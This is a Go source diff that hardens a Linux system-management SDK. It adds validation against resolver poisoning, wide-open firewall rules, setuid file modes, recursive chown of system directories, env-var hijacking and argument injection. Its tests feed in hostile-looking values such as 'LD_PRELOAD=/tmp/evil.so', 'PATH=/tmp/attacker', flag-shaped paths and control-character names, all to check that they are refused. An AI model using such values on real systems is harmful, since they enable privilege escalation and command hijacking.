+		// residual DNS mutation. Best-effort (the up failure is the reported
+		// error); the rollback never re-introduces a custom resolver.
+		_ = runPriv(ctx, m.r, "nmcli", "connection", "modify", conn,
+			"ipv4.dns", "", "ipv6.dns", "", "ipv4.dns-search", "", "ipv6.dns-search", "")
 		return fmt.Errorf("nmcli connection up %s: %w", conn, err)
 	}
 	return nil

--- a/sys/dns/validate.go
+++ b/sys/dns/validate.go
@@ -31,8 +31,17 @@ var validDomainLabel = regexp.MustCompile(`^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-
 //   - the interface, if set, is a valid ifname.
 func validateConfig(cfg Config) error {
 	for _, ns := range cfg.Nameservers {
-		if net.ParseIP(ns) == nil {
+		ip := net.ParseIP(ns)
+		if ip == nil {
 			return fmt.Errorf("%w: nameserver %q is not a valid IP address", ErrInvalidConfig, ns)
+		}
+		// The unspecified address (0.0.0.0 / ::) is never a real resolver:
+		// it is the wildcard "any" address, not a host that answers queries.
+		// Accepting it would let an attacker point the host's DNS at an
+		// unspecified/wildcard-bound listener — a resolver-poisoning primitive
+		// — so it is refused before any backend mutation.
+		if ip.IsUnspecified() {
+			return fmt.Errorf("%w: nameserver %q is the unspecified address and cannot be a resolver", ErrInvalidConfig, ns)
 		}
 	}
 	for _, d := range cfg.SearchDomains {

--- a/sys/exec/exec.go
+++ b/sys/exec/exec.go
@@ -74,6 +74,27 @@ func validateEnvVars(envVars []string) error {
 	return nil
 }
 
+// ValidateCommandEnv checks a Command.Env slice with the EXACT rules the real
+// Runner enforces before it spawns any child: each entry must be KEY=VALUE
+// (ErrInvalidEnvVar), the key must not be a hijack-prone name on the blocklist
+// (ErrBlockedEnvVar — PATH/LD_PRELOAD/BASH_ENV/…), and the key must not be a
+// name the Runner reserves for deterministic output (ErrReservedEnvVar —
+// LC_ALL/LANG/NO_COLOR). It is exported so exectest.FakeRunner can apply the
+// identical gate, keeping the unit tier faithful to the real env boundary — an
+// adversarial Command.Env is rejected the same way against a fake as against a
+// real Runner.
+func ValidateCommandEnv(env []string) error {
+	if err := validateEnvVars(env); err != nil {
+		return err
+	}
+	for _, e := range env {
+		if key, _, _ := strings.Cut(e, "="); isReservedEnvVar(key) {
+			return fmt.Errorf("%w: %q is forced by the Runner (LC_ALL=C/LANG=C/NO_COLOR=1) and may not be set via Command.Env", ErrReservedEnvVar, key)
+		}
+	}
+	return nil
+}
+
 // composeEnv builds the child environment: a leading PATH=childPath (when
 // childPath is non-empty) followed by the caller's already-validated env
 // vars. PATH cannot appear in envVars (it is blocklisted), so the

--- a/sys/exec/exectest/fakerunner.go
+++ b/sys/exec/exectest/fakerunner.go
@@ -82,6 +82,13 @@ func (f *FakeRunner) pop() (exec.Result, error) {
 // scripted result — mirroring the real Runner, so a capability's ctx handling
 // can be unit-tested faithfully.
 func (f *FakeRunner) Run(ctx context.Context, c exec.Command) (exec.Result, error) {
+	// Apply the same env gate the real Runner enforces, BEFORE recording: a
+	// Command carrying a blocked/reserved/malformed env var is rejected and never
+	// recorded or "run", so a capability that builds an adversarial environment
+	// fails identically against the fake and a real Runner.
+	if err := exec.ValidateCommandEnv(c.Env); err != nil {
+		return exec.Result{}, err
+	}
 	f.record(c)
 	if err := ctx.Err(); err != nil {
 		return exec.Result{}, err
@@ -94,6 +101,9 @@ func (f *FakeRunner) Run(ctx context.Context, c exec.Command) (exec.Result, erro
 // be exercised without a real process. A cancelled context short-circuits as in
 // Run (no scripted result consumed, no replay).
 func (f *FakeRunner) Stream(ctx context.Context, c exec.Command, onLine exec.OutputCallback) (exec.Result, error) {
+	if err := exec.ValidateCommandEnv(c.Env); err != nil {
+		return exec.Result{}, err
+	}
 	f.record(c)
 	if err := ctx.Err(); err != nil {
 		return exec.Result{}, err

--- a/sys/exec/exectest/fakerunner_test.go
+++ b/sys/exec/exectest/fakerunner_test.go
@@ -57,6 +57,31 @@ func TestFakeRunner_DefaultsToSuccessWhenUnscripted(t *testing.T) {
 	}
 }
 
+func TestFakeRunner_RejectsBlockedEnvLikeRealRunner(t *testing.T) {
+	cases := []struct {
+		name string
+		env  []string
+		want error
+	}{
+		{name: "LD_PRELOAD", env: []string{"LD_PRELOAD=/tmp/evil.so"}, want: exec.ErrBlockedEnvVar},
+		{name: "PATH override", env: []string{"PATH=/tmp/attacker"}, want: exec.ErrBlockedEnvVar},
+		{name: "reserved locale", env: []string{"LC_ALL=tr_TR.UTF-8"}, want: exec.ErrReservedEnvVar},
+		{name: "malformed", env: []string{"NOT_KEY_VALUE"}, want: exec.ErrInvalidEnvVar},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			f := exectest.New(exec.Direct)
+			_, err := f.Run(context.Background(), exec.Command{Name: "true", Env: tc.env})
+			if !errors.Is(err, tc.want) {
+				t.Fatalf("FakeRunner.Run env %v error = %v, want %v", tc.env, err, tc.want)
+			}
+			if calls := f.Calls(); len(calls) != 0 {
+				t.Fatalf("FakeRunner recorded %d invalid command(s); validation should reject before recording/running: %+v", len(calls), calls)
+			}
+		})
+	}
+}
+
 func TestFakeRunner_BackendReported(t *testing.T) {
 	if got := exectest.New(exec.Sudo).Backend(); got != exec.Sudo {
 		t.Errorf("Backend() = %d, want Sudo", got)

--- a/sys/exec/runner.go
+++ b/sys/exec/runner.go
@@ -223,16 +223,11 @@ var forcedEnv = []string{"LC_ALL=C", "LANG=C", "NO_COLOR=1"}
 // (no ChildPath, no Env) inherits the parent fully; in every case forcedEnv is
 // appended last so the deterministic vars always win.
 func buildChildEnv(c Command) ([]string, error) {
-	if err := validateEnvVars(c.Env); err != nil {
+	// Identical gate the FakeRunner applies (ValidateCommandEnv): KEY=VALUE,
+	// hijack-blocklist, and the forced-locale/NO_COLOR reserved names a consumer
+	// may not set via Env.
+	if err := ValidateCommandEnv(c.Env); err != nil {
 		return nil, err
-	}
-	// The forced-locale/NO_COLOR names are the Runner's invariant — a consumer
-	// may not set them via Env (they'd be silently overridden anyway; reject
-	// explicitly so a mistake surfaces).
-	for _, e := range c.Env {
-		if key, _, _ := strings.Cut(e, "="); isReservedEnvVar(key) {
-			return nil, fmt.Errorf("%w: %q is forced by the Runner (LC_ALL=C/LANG=C/NO_COLOR=1) and may not be set via Command.Env", ErrReservedEnvVar, key)
-		}
 	}
 	switch {
 	case c.ChildPath != "":

--- a/sys/firewall/firewall.go
+++ b/sys/firewall/firewall.go
@@ -127,6 +127,27 @@ func validateAddr(field, addr string) error {
 	return fmt.Errorf("%w: %s %q is not a valid IP address or CIDR", ErrInvalidRule, field, addr)
 }
 
+// validateAllowScope refuses an "allow everything" rule — an allow rule that
+// constrains nothing: no protocol, no port, no source, and no dest. Such a rule
+// opens the host's ingress to every protocol/port from every address, which is
+// never a legitimate per-rule intent (it is a firewall-disable disguised as a
+// rule) and is a classic takeover primitive for an attacker who can drive
+// ApplyRule with remote-influenced input. An allow rule that constrains at least
+// one dimension (e.g. "allow this network full access" — Source set, the rest
+// open) stays accepted; only the fully-unconstrained allow is refused. Deny
+// rules are unaffected: an unconstrained deny ("drop everything") fails closed
+// and is a legitimate default-deny posture.
+func validateAllowScope(rule Rule) error {
+	if rule.Allow &&
+		rule.Protocol == ProtocolAny &&
+		rule.Port == 0 &&
+		rule.Source == "" &&
+		rule.Dest == "" {
+		return fmt.Errorf("%w: rule %q allows all ingress (no protocol, port, source, or dest constraint); an unconstrained allow opens the host and is refused", ErrInvalidRule, rule.ID)
+	}
+	return nil
+}
+
 // validateRule runs every backend-independent invariant a Rule must satisfy
 // before dispatch. Called at the top of every backend's ApplyRule so all three
 // inherit the same rejection contract. Backend-specific rejections (firewalld's
@@ -146,6 +167,9 @@ func validateRule(rule Rule) error {
 		return err
 	}
 	if err := validateAddr("dest", rule.Dest); err != nil {
+		return err
+	}
+	if err := validateAllowScope(rule); err != nil {
 		return err
 	}
 	return nil

--- a/sys/fs/fs.go
+++ b/sys/fs/fs.go
@@ -49,6 +49,21 @@ var ErrInvalidPath = errors.New("invalid filesystem path")
 // escalated path, used by non-root callers, that cannot openat the target.)
 var ErrUnsafeParentDir = errors.New("parent directory is writable by non-root")
 
+// ErrUnsafeMode is returned when a privileged file operation is asked to set a
+// setuid or setgid bit. A managed config write must never create a privileged
+// executable: a setuid-root binary the agent drops is a direct local-root
+// privilege-escalation primitive, so the operation fails closed before any
+// command runs. The sticky bit and ordinary permission bits are unaffected.
+var ErrUnsafeMode = errors.New("setuid/setgid mode is not permitted")
+
+// ErrProtectedTarget is returned when a recursive ownership change (chown -R)
+// targets a whole top-level system directory (`/`, `/etc`, `/usr`, `/home`,
+// `/root`, …). Recursively re-owning such a tree is a destructive
+// privilege-escalation vector (e.g. handing an attacker ownership of every file
+// under `/`), so it fails closed before chown runs. A managed subdirectory
+// (e.g. /home/alice) and single-file SetOwnership are unaffected.
+var ErrProtectedTarget = errors.New("recursive ownership change of a protected system tree is not permitted")
+
 // WriteOptions configures a Manager.WriteFile (or Copy) call.
 type WriteOptions struct {
 	// Mode is the file mode applied before the file is reachable by name. Zero
@@ -179,6 +194,20 @@ func cmdError(name string, res pmexec.Result) error {
 		return nil
 	}
 	return &pmexec.CommandError{Name: name, ExitCode: res.ExitCode, Stderr: res.Stderr}
+}
+
+// validateMode rejects a requested file mode that would set the setuid or
+// setgid bit. Creating a setuid/setgid file through a privileged op is a
+// local-root privilege-escalation primitive (a setuid-root helper, or a
+// setgid binary that inherits a privileged group), so every mutation that
+// applies a mode (WriteFile, SetMode, Copy) refuses it before any command or
+// privileged side effect. The sticky bit and ordinary permission bits remain
+// allowed — only the privilege-conferring bits are refused.
+func validateMode(m os.FileMode) error {
+	if m&(os.ModeSetuid|os.ModeSetgid) != 0 {
+		return fmt.Errorf("%w: mode %s requests setuid/setgid", ErrUnsafeMode, modeArg(m))
+	}
+	return nil
 }
 
 // modeArg formats an os.FileMode as the octal string chmod expects, including

--- a/sys/fs/manager_test.go
+++ b/sys/fs/manager_test.go
@@ -571,9 +571,18 @@ func TestRemountRW(t *testing.T) {
 	if err := m.RemountRW(context.Background(), "/"); err != nil {
 		t.Fatal(err)
 	}
-	if got := argv(f.Calls()[0]); got != "mount -o remount,rw /" {
-		t.Errorf("argv = %q", got)
+	if got := argv(f.Calls()[0]); got != "mount -o remount,rw -- /" {
+		t.Errorf("argv = %q, want mount target after --", got)
 	}
+
+	fInvalid := exectest.New(pmexec.Sudo)
+	if err := mustManager(t, fInvalid).RemountRW(context.Background(), "-O"); !errors.Is(err, ErrInvalidPath) {
+		t.Errorf("RemountRW(flag-shaped path) err = %v, want ErrInvalidPath", err)
+	}
+	if n := len(fInvalid.Calls()); n != 0 {
+		t.Errorf("RemountRW(flag-shaped path) ran %d command(s) before validation; want 0", n)
+	}
+
 	f2 := exectest.New(pmexec.Sudo)
 	f2.Push(pmexec.Result{ExitCode: 1, Stderr: "mount: ro"}, nil)
 	if err := mustManager(t, f2).RemountRW(context.Background(), "/"); err == nil ||

--- a/sys/fs/mount.go
+++ b/sys/fs/mount.go
@@ -31,7 +31,10 @@ func (m *manager) IsReadOnly(ctx context.Context, path string) (bool, error) {
 // RemountRW remounts the filesystem at path read-write through the privilege
 // backend: mount -o remount,rw.
 func (m *manager) RemountRW(ctx context.Context, path string) error {
-	if err := m.runChecked(ctx, "mount", "-o", "remount,rw", path); err != nil {
+	if err := ValidatePath(path); err != nil {
+		return err
+	}
+	if err := m.runChecked(ctx, "mount", "-o", "remount,rw", "--", path); err != nil {
 		return fmt.Errorf("remount %s read-write: %w", path, err)
 	}
 	return nil

--- a/sys/fs/security_machine_test.go
+++ b/sys/fs/security_machine_test.go
@@ -1,0 +1,81 @@
+package fs
+
+import (
+	"context"
+	"os"
+	"testing"
+
+	pmexec "github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/exec/exectest"
+)
+
+type fileMutationAction int
+
+const (
+	fileMutationWriteConfig fileMutationAction = iota
+	fileMutationWriteSetUID
+	fileMutationChmodSetUID
+	fileMutationCopySetUID
+	fileMutationRecursiveChownRoot
+)
+
+type fileMutationStep struct {
+	name       string
+	action     fileMutationAction
+	wantReject bool
+}
+
+// TestFileMutationSecurityMachine models privileged file operations as an
+// attacker-facing state machine. Ordinary managed-config writes may reach the
+// Runner; transitions that create privileged executable bits or recursively
+// change ownership of root/system trees must fail before any escalated command.
+func TestFileMutationSecurityMachine(t *testing.T) {
+	steps := []fileMutationStep{
+		{name: "managed config write is accepted", action: fileMutationWriteConfig},
+		{name: "write with setuid mode is rejected before shell", action: fileMutationWriteSetUID, wantReject: true},
+		{name: "chmod setuid is rejected before chmod", action: fileMutationChmodSetUID, wantReject: true},
+		{name: "copy with setuid mode is rejected before cp", action: fileMutationCopySetUID, wantReject: true},
+		{name: "recursive chown of root is rejected before chown", action: fileMutationRecursiveChownRoot, wantReject: true},
+	}
+
+	for _, step := range steps {
+		t.Run(step.name, func(t *testing.T) {
+			r := exectest.New(pmexec.Sudo)
+			m := mustManager(t, r)
+			err := runFileMutationStep(m, step.action)
+			if step.wantReject {
+				if err == nil {
+					t.Errorf("%s reached accepted state; want validation rejection", step.name)
+				}
+				if calls := r.Calls(); len(calls) != 0 {
+					t.Fatalf("%s reached escalated command execution: %+v", step.name, calls)
+				}
+				return
+			}
+			if err != nil {
+				t.Fatalf("%s unexpected error: %v", step.name, err)
+			}
+			if calls := r.Calls(); len(calls) == 0 {
+				t.Fatalf("%s did not exercise the accepted mutation path", step.name)
+			}
+		})
+	}
+}
+
+func runFileMutationStep(m Manager, action fileMutationAction) error {
+	setuidMode := os.FileMode(0o755) | os.ModeSetuid
+	switch action {
+	case fileMutationWriteConfig:
+		return m.WriteFile(context.Background(), "/etc/pm-example.conf", []byte("ok\n"), WriteOptions{Mode: 0o644, Owner: "root", Group: "root"})
+	case fileMutationWriteSetUID:
+		return m.WriteFile(context.Background(), "/etc/pm-helper", []byte("#!/bin/sh\n"), WriteOptions{Mode: setuidMode, Owner: "root", Group: "root"})
+	case fileMutationChmodSetUID:
+		return m.SetMode(context.Background(), "/etc/pm-helper", setuidMode)
+	case fileMutationCopySetUID:
+		return m.Copy(context.Background(), "/etc/pm-src", "/etc/pm-helper", WriteOptions{Mode: setuidMode})
+	case fileMutationRecursiveChownRoot:
+		return m.SetOwnershipRecursive(context.Background(), "/", "root", "root")
+	default:
+		return nil
+	}
+}

--- a/sys/fs/write.go
+++ b/sys/fs/write.go
@@ -30,6 +30,9 @@ func (m *manager) WriteFile(ctx context.Context, path string, data []byte, opts 
 	if err := ValidatePath(path); err != nil {
 		return err
 	}
+	if err := validateMode(opts.Mode); err != nil {
+		return err
+	}
 	if opts.Backup != "" {
 		if err := ValidatePath(opts.Backup); err != nil {
 			return err
@@ -146,6 +149,9 @@ func (m *manager) Copy(ctx context.Context, src, dst string, opts WriteOptions) 
 	if err := ValidatePath(dst); err != nil {
 		return err
 	}
+	if err := validateMode(opts.Mode); err != nil {
+		return err
+	}
 	if err := m.runChecked(ctx, "cp", "--", src, dst); err != nil {
 		return fmt.Errorf("copy file: %w", err)
 	}
@@ -167,6 +173,9 @@ func (m *manager) Copy(ctx context.Context, src, dst string, opts WriteOptions) 
 // WriteOptions.Mode, which defaults 0 to 0644.
 func (m *manager) SetMode(ctx context.Context, path string, mode os.FileMode) error {
 	if err := ValidatePath(path); err != nil {
+		return err
+	}
+	if err := validateMode(mode); err != nil {
 		return err
 	}
 	return m.runChecked(ctx, "chmod", modeArg(mode), "--", path)
@@ -194,6 +203,14 @@ func (m *manager) SetOwnershipRecursive(ctx context.Context, path, owner, group 
 	}
 	if err := ValidatePath(path); err != nil {
 		return err
+	}
+	// A recursive chown of a whole system tree (`/`, `/etc`, `/usr`, `/home`,
+	// `/root`, …) hands an attacker ownership of every file beneath it — a
+	// privilege-escalation and data-destruction vector. Refuse any top-level
+	// system directory (the same set RemoveDir protects) before chown. A managed
+	// subdirectory (e.g. /home/alice, /var/lib/app) remains re-ownable.
+	if IsProtectedPath(path) {
+		return fmt.Errorf("%w: %s", ErrProtectedTarget, filepath.Clean(path))
 	}
 	return m.runChecked(ctx, "chown", "-R", "--", ownership, path)
 }

--- a/sys/inventory/inventory_container_test.go
+++ b/sys/inventory/inventory_container_test.go
@@ -11,6 +11,7 @@ package inventory
 
 import (
 	"context"
+	"os"
 	osexec "os/exec"
 	"runtime"
 	"strings"
@@ -71,19 +72,44 @@ func TestSystem_ParsesRealProc_Container(t *testing.T) {
 // TestOS_ParsesRealOSRelease_Container pins the /etc/os-release parse against the
 // real (debian) file.
 func TestOS_ParsesRealOSRelease_Container(t *testing.T) {
-	os, err := realCollector(t).OS()
+	got, err := realCollector(t).OS()
 	if err != nil {
 		t.Fatalf("OS: %v", err)
 	}
-	if os.ID != "debian" {
-		t.Errorf("OS.ID = %q, want %q (the container distro)", os.ID, "debian")
+	// Independent verify: read the distro id from /etc/os-release ourselves (a
+	// minimal parse, NOT the code under test) and assert the parser extracted the
+	// SAME id. Distro-agnostic — no hardcoded "debian" — so it pins the real
+	// os-release parse on every container in the matrix.
+	wantID := osReleaseField(t, "ID")
+	if wantID == "" {
+		t.Fatal("could not read ID from /etc/os-release independently")
 	}
-	if os.Name == "" || os.VersionID == "" {
-		t.Errorf("OS Name/VersionID empty: %+v", os)
+	if got.ID != wantID {
+		t.Errorf("OS.ID = %q, want %q (independently read from /etc/os-release)", got.ID, wantID)
 	}
-	if os.Arch != runtime.GOARCH {
-		t.Errorf("OS.Arch = %q, want %q", os.Arch, runtime.GOARCH)
+	if got.Name == "" || got.VersionID == "" {
+		t.Errorf("OS Name/VersionID empty: %+v", got)
 	}
+	if got.Arch != runtime.GOARCH {
+		t.Errorf("OS.Arch = %q, want %q", got.Arch, runtime.GOARCH)
+	}
+}
+
+// osReleaseField reads one key from /etc/os-release with the test's own minimal
+// parse, independent of the production parser, so the comparison is a real
+// cross-check rather than echoing the code under test.
+func osReleaseField(t *testing.T, key string) string {
+	t.Helper()
+	data, err := os.ReadFile("/etc/os-release")
+	if err != nil {
+		t.Fatalf("read /etc/os-release: %v", err)
+	}
+	for _, line := range strings.Split(string(data), "\n") {
+		if k, v, ok := strings.Cut(line, "="); ok && k == key {
+			return strings.Trim(v, `"'`)
+		}
+	}
+	return ""
 }
 
 // TestDisks_ParsesRealLsblk_Container pins the `lsblk --json` parse: it must

--- a/sys/network/edge_test.go
+++ b/sys/network/edge_test.go
@@ -19,7 +19,7 @@ func TestApply_PSK_KeyfileWriteFails(t *testing.T) {
 	r := &recordingRunner{}
 	r.push(exec.Result{Stdout: ""}, nil) // not found → create → provisionPSK → writeKeyfile
 	_, err := mgr(t, r).Apply(context.Background(), Profile{
-		Name: "pm-wifi", SSID: "x", AuthType: AuthPSK, PSK: mustSecret(t, "p"),
+		Name: "pm-wifi", SSID: "x", AuthType: AuthPSK, PSK: mustSecret(t, "valid-wpa2-psk"),
 	})
 	if err == nil || !strings.Contains(err.Error(), "create PSK connection") {
 		t.Errorf("err = %v, want a wrapped keyfile-write failure", err)
@@ -32,7 +32,7 @@ func TestApply_PSK_UpdateReloadFails(t *testing.T) {
 	r.push(exec.Result{Stdout: "pm-wifi\n"}, nil)                  // exists → update
 	r.push(exec.Result{ExitCode: 2, Stderr: "reload failed"}, nil) // reload fails
 	_, err := mgr(t, r).Apply(context.Background(), Profile{
-		Name: "pm-wifi", SSID: "x", AuthType: AuthPSK, PSK: mustSecret(t, "p"),
+		Name: "pm-wifi", SSID: "x", AuthType: AuthPSK, PSK: mustSecret(t, "valid-wpa2-psk"),
 	})
 	if err == nil || !strings.Contains(err.Error(), "update PSK connection") {
 		t.Errorf("err = %v, want a wrapped update-reload failure", err)
@@ -61,7 +61,7 @@ func TestNmcliWrite_ExecError(t *testing.T) {
 	r.push(exec.Result{Stdout: ""}, nil)                              // not found
 	r.push(exec.Result{}, errors.New("sudo: a password is required")) // reload can't execute
 	_, err := mgr(t, r).Apply(context.Background(), Profile{
-		Name: "pm-wifi", SSID: "x", AuthType: AuthPSK, PSK: mustSecret(t, "p"),
+		Name: "pm-wifi", SSID: "x", AuthType: AuthPSK, PSK: mustSecret(t, "valid-wpa2-psk"),
 	})
 	if err == nil || !strings.Contains(err.Error(), "create PSK connection") {
 		t.Errorf("err = %v, want the exec-error path wrapped", err)

--- a/sys/network/keyfile.go
+++ b/sys/network/keyfile.go
@@ -4,6 +4,8 @@ import (
 	"fmt"
 	"path/filepath"
 	"strings"
+
+	"github.com/manchtools/power-manage-sdk/sys/exec"
 )
 
 // NetworkManager keyfile-based PSK provisioning.
@@ -35,6 +37,56 @@ var nmKeyfileDir = "/etc/NetworkManager/system-connections"
 func keyfilePath(name string) string {
 	safe := strings.ReplaceAll(name, string(filepath.Separator), "_")
 	return filepath.Join(nmKeyfileDir, safe+".nmconnection")
+}
+
+// validatePSK enforces the WPA-PSK key contract before the secret is rendered
+// into the keyfile `psk=` line: a WPA2/WPA3 pre-shared key is either an 8–63
+// character passphrase of printable ASCII (0x20–0x7e), or the raw 256-bit PMK
+// written as exactly 64 hexadecimal digits. Anything shorter, longer, or a
+// 64-character value that is not valid hex is malformed and rejected here, before
+// provisionPSK writes the keyfile or runs `nmcli connection reload`.
+//
+// The PSK is revealed locally to measure its length and character class; this is
+// the same sanctioned [wifi-security] PSK sink as buildPSKKeyfile (it never
+// reaches argv, a log, or the returned error — the error reports only the
+// failure mode, never the value). Callers reach this only through
+// validateProfile, so the check precedes any Runner command.
+func validatePSK(psk exec.Secret) error {
+	v := psk.Reveal()
+	n := len(v)
+	// A 64-character value is treated as a raw PMK and must be valid hex; a value
+	// of any other length must be an 8–63 char printable-ASCII passphrase.
+	if n == 64 && isHex(v) {
+		return nil
+	}
+	if n < 8 || n > 63 {
+		return fmt.Errorf("invalid PSK: a WPA pre-shared key must be 8–63 characters (or a 64-hex-digit raw PMK)")
+	}
+	for i := 0; i < n; i++ {
+		c := v[i]
+		if c < 0x20 || c > 0x7e {
+			return fmt.Errorf("invalid PSK: must contain only printable ASCII characters")
+		}
+	}
+	return nil
+}
+
+// isHex reports whether s consists solely of hexadecimal digits (used to tell a
+// raw 64-octet PMK apart from a malformed 64-character passphrase).
+func isHex(s string) bool {
+	if s == "" {
+		return false
+	}
+	for i := 0; i < len(s); i++ {
+		c := s[i]
+		isDigit := c >= '0' && c <= '9'
+		isLower := c >= 'a' && c <= 'f'
+		isUpper := c >= 'A' && c <= 'F'
+		if !isDigit && !isLower && !isUpper {
+			return false
+		}
+	}
+	return true
 }
 
 // buildPSKKeyfile builds a NetworkManager keyfile body for a PSK profile, ready

--- a/sys/network/keyfile_injection_test.go
+++ b/sys/network/keyfile_injection_test.go
@@ -40,6 +40,21 @@ func TestValidateProfile_RejectsControlChars(t *testing.T) {
 	}
 }
 
+func TestValidateProfile_RejectsWeakOrMalformedPSK(t *testing.T) {
+	cases := map[string]string{
+		"too short":    "short7!",
+		"too long":     strings.Repeat("a", 65),
+		"bad 64-octet": strings.Repeat("z", 64),
+	}
+	for name, psk := range cases {
+		t.Run(name, func(t *testing.T) {
+			if err := validateProfile(Profile{Name: "pm-wifi-1", SSID: "CorpNet", AuthType: AuthPSK, PSK: mustSecret(t, psk)}); err == nil {
+				t.Fatalf("validateProfile accepted malformed WPA-PSK case %q", name)
+			}
+		})
+	}
+}
+
 // TestApply_RejectsInjectionBeforeAnyCommand: Apply validates the profile first,
 // so an injectable field is refused before any nmcli runs or keyfile is written.
 func TestApply_RejectsInjectionBeforeAnyCommand(t *testing.T) {
@@ -56,7 +71,7 @@ func TestApply_RejectsInjectionBeforeAnyCommand(t *testing.T) {
 }
 
 func TestConnectionNameMethods_RejectInvalidName(t *testing.T) {
-	for _, name := range []string{"-x", "a\nb", "", "x\x00y"} {
+	for _, name := range []string{"-x", "a\nb", "", "x\x00y", "tenant/prod"} {
 		t.Run(name, func(t *testing.T) {
 			r := &recordingRunner{}
 			m := mgr(t, r)

--- a/sys/network/keyfile_test.go
+++ b/sys/network/keyfile_test.go
@@ -38,7 +38,7 @@ func TestBuildPSKKeyfile(t *testing.T) {
 
 func TestBuildPSKKeyfile_AutoConnectFalseNoHidden(t *testing.T) {
 	body := string(buildPSKKeyfile(Profile{
-		Name: "pm-wifi-2", SSID: "OpenNet", AuthType: AuthPSK, PSK: mustSecret(t, "p"),
+		Name: "pm-wifi-2", SSID: "OpenNet", AuthType: AuthPSK, PSK: mustSecret(t, "valid-wpa2-psk"),
 	}))
 	if !strings.Contains(body, "autoconnect=false") {
 		t.Errorf("expected autoconnect=false:\n%s", body)

--- a/sys/network/network.go
+++ b/sys/network/network.go
@@ -145,6 +145,12 @@ func validateProfile(p Profile) error {
 		if p.PSK.HasNewline() {
 			return fmt.Errorf("invalid PSK: must not contain a newline or carriage return")
 		}
+		// Enforce the WPA-PSK key contract (8–63 printable-ASCII chars, or a
+		// 64-hex-digit raw PMK) before the keyfile is written or nmcli reloaded,
+		// so a weak/malformed key never reaches NetworkManager.
+		if err := validatePSK(p.PSK); err != nil {
+			return err
+		}
 	case AuthEAPTLS:
 		if p.Identity == "" {
 			return fmt.Errorf("identity is required for EAP-TLS authentication")
@@ -184,7 +190,11 @@ func containsControl(s string) bool {
 
 // validateConnName validates a connection name. It is rendered into the keyfile
 // (`id=`) and passed to nmcli as an argument, so it must be non-empty, free of
-// control characters, and not start with '-' (which nmcli would read as a flag).
+// control characters, not start with '-' (which nmcli would read as a flag), and
+// contain no '/' path separator. The name is also re-derived from untrusted host
+// `nmcli con show` output before it is fed back into a mutation (con mod / up /
+// delete), so the same rejection must hold when a name read back from the host is
+// re-validated — host output is not trusted.
 func validateConnName(name string) error {
 	if name == "" {
 		return fmt.Errorf("connection name is required")
@@ -194,6 +204,12 @@ func validateConnName(name string) error {
 	}
 	if strings.HasPrefix(name, "-") {
 		return fmt.Errorf("invalid connection name %q: must not start with '-'", name)
+	}
+	// A '/' would let a name escape the system-connections directory when used to
+	// derive the keyfile path; keyfilePath sanitizes it defensively, but the name
+	// itself is never legitimately path-shaped, so reject it outright.
+	if strings.ContainsRune(name, '/') {
+		return fmt.Errorf("invalid connection name %q: must not contain '/'", name)
 	}
 	return nil
 }

--- a/sys/network/network_test.go
+++ b/sys/network/network_test.go
@@ -293,7 +293,7 @@ func TestApply_PSK_ReloadFailure(t *testing.T) {
 	r.push(exec.Result{Stdout: ""}, nil)                                  // not found
 	r.push(exec.Result{ExitCode: 2, Stderr: "Error: reload failed"}, nil) // reload fails
 	_, err := mgr(t, r).Apply(context.Background(), Profile{
-		Name: "pm-wifi-01", SSID: "CorpNet", AuthType: AuthPSK, PSK: mustSecret(t, "p"),
+		Name: "pm-wifi-01", SSID: "CorpNet", AuthType: AuthPSK, PSK: mustSecret(t, "valid-wpa2-psk"),
 	})
 	if err == nil || !strings.Contains(err.Error(), "create PSK connection") {
 		t.Errorf("Apply err = %v, want a wrapped reload failure", err)
@@ -484,7 +484,7 @@ func TestApply_ConnectionExistsErrorAborts(t *testing.T) {
 	r := &recordingRunner{}
 	r.push(exec.Result{}, errors.New("nmcli down"))
 	if _, err := mgr(t, r).Apply(context.Background(), Profile{
-		Name: "pm-wifi", SSID: "x", AuthType: AuthPSK, PSK: mustSecret(t, "p"),
+		Name: "pm-wifi", SSID: "x", AuthType: AuthPSK, PSK: mustSecret(t, "valid-wpa2-psk"),
 	}); err == nil {
 		t.Error("Apply continued past a ConnectionExists failure")
 	}
@@ -565,10 +565,10 @@ func TestValidateProfile(t *testing.T) {
 		profile Profile
 		wantErr bool
 	}{
-		{"valid PSK", Profile{Name: "t", SSID: "n", AuthType: AuthPSK, PSK: mustSecret(t, "pass")}, false},
+		{"valid PSK", Profile{Name: "t", SSID: "n", AuthType: AuthPSK, PSK: mustSecret(t, "valid-wpa2-psk")}, false},
 		{"valid EAP-TLS", Profile{Name: "t", SSID: "n", AuthType: AuthEAPTLS, Identity: "u", CertDir: good, ClientCert: "c", ClientKey: exec.NewMultilineSecret(realPEMKey)}, false},
-		{"missing name", Profile{SSID: "n", AuthType: AuthPSK, PSK: mustSecret(t, "p")}, true},
-		{"missing SSID", Profile{Name: "t", AuthType: AuthPSK, PSK: mustSecret(t, "p")}, true},
+		{"missing name", Profile{SSID: "n", AuthType: AuthPSK, PSK: mustSecret(t, "valid-wpa2-psk")}, true},
+		{"missing SSID", Profile{Name: "t", AuthType: AuthPSK, PSK: mustSecret(t, "valid-wpa2-psk")}, true},
 		{"empty PSK", Profile{Name: "t", SSID: "n", AuthType: AuthPSK}, true},
 		{"missing identity", Profile{Name: "t", SSID: "n", AuthType: AuthEAPTLS, CertDir: good, ClientCert: "c", ClientKey: exec.NewMultilineSecret("k")}, true},
 		{"missing certdir", Profile{Name: "t", SSID: "n", AuthType: AuthEAPTLS, Identity: "u", ClientCert: "c", ClientKey: exec.NewMultilineSecret("k")}, true},

--- a/sys/network/networkmanager.go
+++ b/sys/network/networkmanager.go
@@ -214,6 +214,9 @@ func (m *networkManager) stagedModify(ctx context.Context, p Profile, current ma
 // Delete removes a WiFi connection by name and, if opts.CertDir is set, cleans up
 // its cert directory.
 func (m *networkManager) Delete(ctx context.Context, name string, opts DeleteOptions) error {
+	if err := validateConnName(name); err != nil {
+		return err
+	}
 	exists, err := m.ConnectionExists(ctx, name)
 	if err != nil {
 		return err

--- a/sys/notify/notify.go
+++ b/sys/notify/notify.go
@@ -53,6 +53,13 @@ type Manager interface {
 	NotifyUsers(ctx context.Context, usernames []string, title, message string) error
 }
 
+// maxNotificationField bounds the title and message length. wall and
+// notify-send both render their input into a terminal / desktop banner an
+// operator reads, and an unbounded payload is a denial-of-service / scroll-the-
+// screen vector (and a needless burden on every session). 4096 bytes is far
+// more than any real maintenance notice needs.
+const maxNotificationField = 4096
+
